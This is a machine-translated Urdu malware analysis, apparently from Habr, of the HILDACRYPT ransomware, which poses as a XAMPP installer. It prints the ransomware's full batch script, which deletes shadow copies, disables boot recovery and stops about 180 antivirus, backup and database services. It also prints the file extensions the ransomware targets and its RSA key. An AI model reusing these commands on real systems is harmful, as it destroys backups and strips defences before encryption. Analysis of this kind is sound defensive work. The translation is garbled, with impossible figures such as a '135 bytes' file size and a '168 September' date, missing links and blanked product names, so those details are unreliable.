ہیلو، حبر! ایک بار پھر، ہم رینسم ویئر کے زمرے سے میلویئر کے تازہ ترین ورژن کے بارے میں بات کر رہے ہیں۔ HILDACRYPT ایک نیا ransomware ہے، Hilda خاندان کا ایک رکن جسے اگست 2019 میں دریافت کیا گیا تھا، اس کا نام Netflix کارٹون کے نام پر رکھا گیا ہے جو سافٹ ویئر کو تقسیم کرنے کے لیے استعمال کیا گیا تھا۔ آج ہم اس اپ ڈیٹ شدہ رینسم ویئر وائرس کی تکنیکی خصوصیات سے واقف ہو رہے ہیں۔
ہلڈا رینسم ویئر کے پہلے ورژن میں، یوٹیوب پر پوسٹ کردہ ایک کا لنک تاوان کے خط میں کارٹون سیریز موجود تھی۔ HILDACRYPT ایک جائز XAMPP انسٹالر کے طور پر نقاب پوش ہے، ایک آسان انسٹال کرنے والی Apache تقسیم جس میں MariaDB، PHP، اور Perl شامل ہیں۔ ایک ہی وقت میں، cryptolocker کے پاس ایک مختلف فائل کا نام ہے - xamp۔ اس کے علاوہ، ransomware فائل میں الیکٹرانک دستخط نہیں ہوتے ہیں۔
جامد تجزیہ
رینسم ویئر ایم ایس ونڈوز کے لیے لکھی گئی PE32 .NET فائل میں موجود ہے۔ اس کا سائز 135 بائٹس ہے۔ مرکزی پروگرام کوڈ اور محافظ پروگرام کوڈ دونوں C# میں لکھے گئے ہیں۔ تالیف کی تاریخ اور ٹائم اسٹیمپ کے مطابق، بائنری 168 ستمبر 14 کو بنائی گئی تھی۔
Detect It Easy کے مطابق، ransomware کو Confuser اور ConfuserEx کا استعمال کرتے ہوئے آرکائیو کیا جاتا ہے، لیکن یہ obfuscators پہلے کی طرح ہی ہیں، صرف ConfuserEx کنفیوزر کا جانشین ہے، اس لیے ان کے کوڈ کے دستخط ایک جیسے ہیں۔
HILDACRYPT واقعی ConfuserEx کے ساتھ پیک کیا گیا ہے۔
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
حملہ ویکٹر
غالباً، رینسم ویئر کو ویب پروگرامنگ سائٹس میں سے ایک پر دریافت کیا گیا تھا، جو کہ ایک جائز XAMPP پروگرام کے طور پر چھپا ہوا تھا۔
انفیکشن کا پورا سلسلہ اس میں دیکھا جا سکتا ہے۔ .
الجھن
ransomware کے تاروں کو انکرپٹڈ شکل میں محفوظ کیا جاتا ہے۔ لانچ ہونے پر، HILDACRYPT انہیں Base64 اور AES-256-CBC کا استعمال کرتے ہوئے ڈیکرپٹ کرتا ہے۔
تنصیب
سب سے پہلے، ransomware %AppDataRoaming% میں ایک فولڈر بناتا ہے جس میں GUID (Globally Unique Identifier) پیرامیٹر بے ترتیب طور پر تیار ہوتا ہے۔ اس جگہ پر ایک بیٹ فائل شامل کرنے سے، رینسم ویئر وائرس اسے cmd.exe کا استعمال کرتے ہوئے لانچ کرتا ہے:
cmd.exe /c JKfgkgj3hjgfhjka.bat اور باہر نکلیں
اس کے بعد یہ سسٹم کی خصوصیات یا خدمات کو غیر فعال کرنے کے لیے بیچ اسکرپٹ پر عمل درآمد شروع کرتا ہے۔
اسکرپٹ میں کمانڈز کی ایک لمبی فہرست ہے جو شیڈو کاپیوں کو تباہ کرتی ہے، ایس کیو ایل سرور کو غیر فعال کرتی ہے، بیک اپ اور اینٹی وائرس حل کرتی ہے۔
مثال کے طور پر، یہ Acronis بیک اپ سروسز کو روکنے کی ناکام کوشش کرتا ہے۔ اس کے علاوہ، یہ مندرجہ ذیل وینڈرز کے بیک اپ سسٹم اور اینٹی وائرس سلوشنز پر حملہ کرتا ہے: Veeam، Sophos، Kaspersky، McAfee اور دیگر۔
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
اوپر بیان کردہ خدمات اور عمل کے غیر فعال ہونے کے بعد، cryptolocker ٹاسک لسٹ کمانڈ کا استعمال کرتے ہوئے تمام چلنے والے عمل کے بارے میں معلومات اکٹھا کرتا ہے تاکہ یہ یقینی بنایا جا سکے کہ تمام ضروری خدمات بند ہیں۔
ٹاسک لسٹ v/fo csv
یہ کمانڈ چلنے والے عمل کی ایک تفصیلی فہرست دکھاتی ہے، جن کے عناصر کو "،" نشان سے الگ کیا جاتا ہے۔
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
اس چیک کے بعد، رینسم ویئر انکرپشن کا عمل شروع کرتا ہے۔
خفیہ کاری۔
فائل کی خفیہ کاری
HILDACRYPT ہارڈ ڈرائیوز کے تمام پائے جانے والے مواد سے گزرتا ہے، سوائے Recycle.Bin اور Reference AssembliesMicrosoft فولڈرز کے۔ مؤخر الذکر میں .Net ایپلیکیشنز کے لیے اہم dll، pdb وغیرہ فائلیں ہیں جو رینسم ویئر کے آپریشن کو متاثر کر سکتی ہیں۔ ان فائلوں کو تلاش کرنے کے لیے جنہیں خفیہ کیا جائے گا، درج ذیل ایکسٹینشنز کی فہرست استعمال کی جاتی ہے۔
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
رینسم ویئر صارف کی فائلوں کو خفیہ کرنے کے لیے AES-256-CBC الگورتھم کا استعمال کرتا ہے۔ کلیدی سائز 256 بٹس ہے اور ابتدائی ویکٹر (IV) کا سائز 16 بائٹس ہے۔
درج ذیل اسکرین شاٹ میں، byte_2 اور byte_1 کی قدریں GetBytes() کا استعمال کرتے ہوئے تصادفی طور پر حاصل کی گئیں۔
کلیدی
میں اور
انکرپٹڈ فائل میں ایکسٹینشن HCY ہے!.. یہ ایک انکرپٹڈ فائل کی مثال ہے۔ مذکورہ کلید اور IV اس فائل کے لیے بنائے گئے تھے۔
کلیدی خفیہ کاری
cryptolocker تیار کردہ AES کلید کو ایک انکرپٹڈ فائل میں اسٹور کرتا ہے۔ انکرپٹڈ فائل کے پہلے حصے میں ایک ہیڈر ہوتا ہے جس میں ڈیٹا ہوتا ہے جیسے کہ HILDACRYPT، KEY، IV، FileLen XML فارمیٹ میں، اور اس طرح لگتا ہے:
AES اور IV کلیدی خفیہ کاری RSA-2048 کا استعمال کرتے ہوئے کی جاتی ہے، اور انکوڈنگ Base64 کا استعمال کرتے ہوئے کی جاتی ہے۔ RSA عوامی کلید XML فارمیٹ میں خفیہ کردہ تاروں میں سے ایک میں cryptolocker کے جسم میں محفوظ ہوتی ہے۔
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES فائل کلید کو خفیہ کرنے کے لیے ایک RSA عوامی کلید استعمال کی جاتی ہے۔ RSA پبلک کلید Base64 انکوڈ شدہ ہے اور یہ ایک ماڈیولس اور 65537 کے ایک پبلک ایکسپوننٹ پر مشتمل ہے۔ ڈکرپشن کے لیے RSA کی نجی کلید کی ضرورت ہوتی ہے، جو حملہ آور کے پاس ہوتی ہے۔
RSA انکرپشن کے بعد، AES کلید کو انکرپٹڈ فائل میں محفوظ کردہ Base64 کا استعمال کرتے ہوئے انکوڈ کیا جاتا ہے۔
تاوان کا پیغام
خفیہ کاری مکمل ہونے کے بعد، HILDACRYPT HTML فائل کو اس فولڈر میں لکھتا ہے جس میں اس نے فائلوں کو انکرپٹ کیا تھا۔ ransomware نوٹیفکیشن میں دو ای میل پتے ہیں جہاں شکار حملہ آور سے رابطہ کر سکتا ہے۔
بھتہ خوری کے نوٹس میں یہ سطر بھی شامل ہے "کوئی لولی محفوظ نہیں ہے؛)" - جاپان میں ممنوعہ چھوٹی لڑکیوں کی ظاہری شکل کے ساتھ anime اور مانگا کرداروں کا حوالہ۔
آؤٹ پٹ
HILDACRYPT، ایک نئے ransomware خاندان نے ایک نیا ورژن جاری کیا ہے۔ انکرپشن ماڈل شکار کو رینسم ویئر کے ذریعے خفیہ کردہ فائلوں کو ڈکرپٹ کرنے سے روکتا ہے۔ Cryptolocker بیک اپ سسٹمز اور اینٹی وائرس حل سے متعلق تحفظ کی خدمات کو غیر فعال کرنے کے لیے فعال تحفظ کے طریقے استعمال کرتا ہے۔ HILDACRYPT کا مصنف Netflix پر دکھائی جانے والی اینی میٹڈ سیریز ہلڈا کا مداح ہے، جس کے ٹریلر کا لنک پروگرام کے پچھلے ورژن کے خرید آؤٹ لیٹر میں موجود تھا۔
ہمیشہ کی طرح، и آپ کے کمپیوٹر کو HILDACRYPT ransomware سے محفوظ رکھ سکتا ہے، اور فراہم کنندگان کے پاس اپنے صارفین کی حفاظت کرنے کی صلاحیت ہے . تحفظ اس حقیقت سے یقینی بنایا جاتا ہے کہ ان حلوں میں شامل ہیں۔ اس میں نہ صرف بیک اپ، بلکہ ہمارا مربوط سیکیورٹی سسٹم بھی شامل ہے۔ - ایک مشین لرننگ ماڈل کے ذریعے تقویت یافتہ اور طرز عمل کی تحقیق پر مبنی، ایک ایسی ٹیکنالوجی جو صفر دن کے رینسم ویئر کے خطرے کا مقابلہ کرنے کی صلاحیت رکھتی ہے جیسا کہ کوئی اور نہیں۔
سمجھوتے کے اشارے۔
فائل کی توسیع HCY!
HILDACRYPReadMe.html
xamp.exe ایک حرف "p" کے ساتھ اور کوئی ڈیجیٹل دستخط نہیں ہے۔
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
ماخذ: www.habr.com